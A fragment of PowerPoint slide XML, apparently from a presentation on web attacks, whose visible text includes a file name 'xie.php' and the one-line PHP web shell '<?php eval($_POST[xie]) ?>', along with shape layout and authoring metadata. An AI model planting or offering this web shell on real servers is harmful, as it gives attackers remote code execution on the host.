                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'xie.php'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1B859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) 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1B859"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'&lt;? php eval($_POST[xie]) ?&gt;'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 ) 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9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088D86DF-410F-4838-BE99-29730D2CC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42" y="2136386"/>
            <a:ext cx="6292380" cy="213703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F2B9FFED-5D56-4725-9DED-CEF423BF3388}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3203325" y="3195707"/>
            <a:ext cx="2029075" cy="353943"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875">
            <a:solidFill>
              <a:srgbClr val="90A4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60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228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Cool ScencC</dc:creator>
  <cp:lastModifiedBy>Cool ScencC</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-21T11:21:19Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-22T14:15:55Z</dcterms:modified>
</cp:coreProperties>
</file>